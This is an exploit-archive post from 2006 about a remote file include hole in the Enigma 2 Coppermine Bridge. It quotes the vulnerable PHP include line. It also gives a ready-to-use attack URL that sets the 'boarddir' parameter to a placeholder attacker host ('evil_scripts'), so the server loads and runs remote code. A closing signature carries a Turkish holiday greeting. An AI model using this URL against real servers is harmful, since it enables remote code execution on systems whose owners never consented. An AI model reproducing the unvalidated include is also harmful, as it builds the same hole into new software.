id: 1346
date: 12/30/2006
title: Enigma 2 Coppermine Bridge (boarddir) Remote File Include Vulnerability
author: xoron
cves: 

=======================================================================
Enigma 2 Coppermine Bridge (boarddir) Remote File Include Vulnerability
=======================================================================



-----------------------------------------------
 
Vuln Code:

require_once($boarddir . '/PortalSources/Portal.ini.php');

-----------------------------------------------

3xplo!t:

/bridge/enigma/E2_header.inc.php?boarddir=http://evil_scripts?


-----------------------------------------------
XORON   -   XORON   -   XORON   -   XORON   -   XORON
-----------------------------------------------------------
-                                                         -
-                                                         -
- Tum muslumanlarin kurban bayrami simdiden mubarek olsun -
-                                                         -
-----------------------------------------------------------




#  0day.today [2023-03-26]  #